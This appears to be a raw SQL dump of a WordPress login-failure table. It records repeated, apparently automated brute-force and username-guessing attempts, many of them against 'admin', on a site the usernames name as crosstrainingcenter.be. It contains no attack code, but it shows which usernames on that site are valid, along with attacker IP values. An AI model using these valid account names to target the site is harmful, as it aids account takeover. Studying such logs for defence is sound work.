(100918, 1496685559.448722, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100917, 1496685559.027818, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100916, 1496685558.718846, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100915, 1496685558.410216, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100914, 1496685558.101838, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100913, 1496685557.793170, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100912, 1496685557.485379, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100911, 1496685557.174228, 1, 'loginFailValidUsername', 'admin', 1, 96963116, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100910, 1496671032.391234, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100909, 1496671032.079949, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100908, 1496671031.770692, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100907, 1496671031.458144, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100906, 1496671031.148801, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100905, 1496671030.834937, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100904, 1496671030.521807, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100903, 1496671030.213027, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100902, 1496671029.903056, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100901, 1496671029.589165, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100900, 1496671029.280811, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100899, 1496671028.968602, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100898, 1496671028.660404, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100897, 1496671028.352838, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100896, 1496671028.043947, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100895, 1496671027.732892, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100894, 1496671027.424609, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100893, 1496671027.116692, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100892, 1496671026.735394, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100891, 1496649439.026567, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100890, 1496649438.715356, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100889, 1496649438.406839, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100888, 1496649438.099223, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100887, 1496649437.789447, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100886, 1496649437.476428, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100885, 1496649437.162568, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100884, 1496649436.790293, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100883, 1496649436.479643, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100882, 1496649436.169982, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100881, 1496649435.861299, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100880, 1496649435.552564, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100879, 1496649435.244051, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100878, 1496649434.932181, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100877, 1496649434.621298, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100876, 1496649434.311358, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100875, 1496649434.003478, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100874, 1496649433.694087, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100873, 1496649433.379529, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100872, 1496630998.285053, 1, 'loginFailValidUsername', 'admin', 1, 3063980351, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100871, 1496630996.753264, 1, 'loginFailValidUsername', 'pablo', 3, 3063980351, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100870, 1496630995.208833, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 3063980351, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100869, 1496630993.665729, 1, 'loginFailValidUsername', 'julie', 2, 3063980351, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100868, 1496630992.080663, 1, 'loginFailValidUsername', 'julie', 2, 3063980351, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100867, 1496620629.640516, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100866, 1496620629.331696, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100865, 1496620629.023740, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100864, 1496620628.715556, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100863, 1496620628.407472, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100862, 1496620628.098737, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100861, 1496620627.789995, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100860, 1496620627.482068, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100859, 1496620627.174032, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100858, 1496620626.865905, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100857, 1496620626.557828, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100856, 1496620626.248662, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100855, 1496620625.938303, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100854, 1496620625.630042, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100853, 1496620625.317774, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100852, 1496620625.009914, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100851, 1496620624.701807, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100850, 1496620624.394017, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100849, 1496620624.065056, 1, 'loginFailValidUsername', 'admin', 1, 1168352192, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100848, 1496614560.497707, 1, 'loginFailValidUsername', 'julie', 2, 2833926914, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100847, 1496600286.402210, 1, 'loginFailValidUsername', 'julie', 2, 1307193800, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100846, 1496599615.564602, 1, 'loginFailInvalidUsername', 'center', 0, 3326602014, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100845, 1496599613.445549, 1, 'loginFailInvalidUsername', 'namur', 0, 3326602014, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100844, 1496599611.545982, 1, 'loginFailInvalidUsername', 'travail', 0, 3326602014, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100843, 1496599609.503254, 1, 'loginFailInvalidUsername', 'professionnel', 0, 3326602014, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100842, 1496599607.599626, 1, 'loginFailInvalidUsername', 'outils', 0, 3326602014, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100841, 1496599605.503834, 1, 'loginFailInvalidUsername', 'venez', 0, 3326602014, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100840, 1496599603.606198, 1, 'loginFailInvalidUsername', 'objectifs', 0, 3326602014, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100839, 1496599601.682233, 1, 'loginFailInvalidUsername', 'cross', 0, 3326602014, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100838, 1496599599.548893, 1, 'loginFailInvalidUsername', 'pour', 0, 3326602014, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100837, 1496599597.349796, 1, 'loginFailInvalidUsername', 'notre', 0, 3326602014, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100836, 1496599149.782007, 1, 'loginFailInvalidUsername', 'training', 0, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100835, 1496599147.822906, 1, 'loginFailInvalidUsername', 'vous', 0, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100834, 1496599145.842630, 1, 'loginFailValidUsername', 'pablo', 3, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100833, 1496599143.800369, 1, 'loginFailValidUsername', 'julie', 2, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100832, 1496599141.646385, 1, 'loginFailValidUsername', 'admin', 1, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100831, 1496599139.624256, 1, 'loginFailInvalidUsername', 'center', 0, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100830, 1496599137.616583, 1, 'loginFailInvalidUsername', 'namur', 0, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100829, 1496599135.662349, 1, 'loginFailInvalidUsername', 'travail', 0, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100828, 1496599133.332626, 1, 'loginFailInvalidUsername', 'professionnel', 0, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100827, 1496599131.214729, 1, 'loginFailInvalidUsername', 'outils', 0, 3635199372, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100826, 1496598371.429855, 1, 'loginFailInvalidUsername', 'venez', 0, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100825, 1496598369.636971, 1, 'loginFailInvalidUsername', 'objectifs', 0, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100824, 1496598368.000931, 1, 'loginFailInvalidUsername', 'cross', 0, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100823, 1496598366.306186, 1, 'loginFailInvalidUsername', 'pour', 0, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100822, 1496598364.631717, 1, 'loginFailInvalidUsername', 'notre', 0, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100821, 1496598362.955987, 1, 'loginFailInvalidUsername', 'training', 0, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100820, 1496598361.318593, 1, 'loginFailInvalidUsername', 'vous', 0, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100819, 1496598359.671821, 1, 'loginFailValidUsername', 'pablo', 3, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100818, 1496598358.034289, 1, 'loginFailValidUsername', 'julie', 2, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100817, 1496598356.337133, 1, 'loginFailValidUsername', 'admin', 1, 3164986572, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100816, 1496597937.142829, 1, 'loginFailInvalidUsername', 'notre', 0, 874456664, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100815, 1496597512.485643, 1, 'loginFailInvalidUsername', 'outils', 0, 1707700163, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100814, 1496525607.939128, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539837082, 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)'),
(100813, 1496525307.229183, 1, 'loginFailValidUsername', 'admin', 1, 1539837082, 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)'),
(100812, 1496525008.217242, 1, 'loginFailInvalidUsername', 'Cross', 0, 1539837082, 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)'),
(100811, 1496524706.704205, 1, 'loginFailInvalidUsername', 'www.crosstrainingcenter.be', 0, 1539837082, 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)'),
(100810, 1496524406.316551, 1, 'loginFailInvalidUsername', 'www.crosstrainingcenter.be', 0, 1539837082, 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)'),
(100809, 1496515377.840222, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539837019, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.04.57 (KHTML, like Gecko) Version/5.5.1 Safari/532.12'),
(100808, 1496512596.167746, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100807, 1496512595.850822, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100806, 1496512595.541095, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100805, 1496512595.231242, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100804, 1496512594.922909, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100803, 1496512594.614870, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100802, 1496512594.302767, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100801, 1496512593.993520, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100800, 1496512593.685425, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100799, 1496512593.375393, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100798, 1496512593.067824, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100797, 1496512592.758986, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100796, 1496512592.451028, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100795, 1496512592.143566, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100794, 1496512591.834312, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100793, 1496512591.525989, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100792, 1496512591.217321, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100791, 1496512590.908880, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100790, 1496512590.558421, 1, 'loginFailValidUsername', 'admin', 1, 1049988935, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100789, 1496486529.935212, 1, 'loginFailValidUsername', 'admin', 1, 2249451223, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100788, 1496486529.935096, 1, 'loginFailValidUsername', 'admin', 1, 2249451223, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100787, 1496483793.117858, 1, 'loginFailInvalidUsername', 'wocaoaaaa', 0, 1539836946, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0'),
(100786, 1496483256.847156, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100785, 1496483256.537733, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100784, 1496483256.228181, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100783, 1496483255.918518, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100782, 1496483255.609853, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100781, 1496483255.301011, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100780, 1496483254.992887, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100779, 1496483254.684882, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100778, 1496483254.377038, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100777, 1496483254.065764, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100776, 1496483253.751747, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
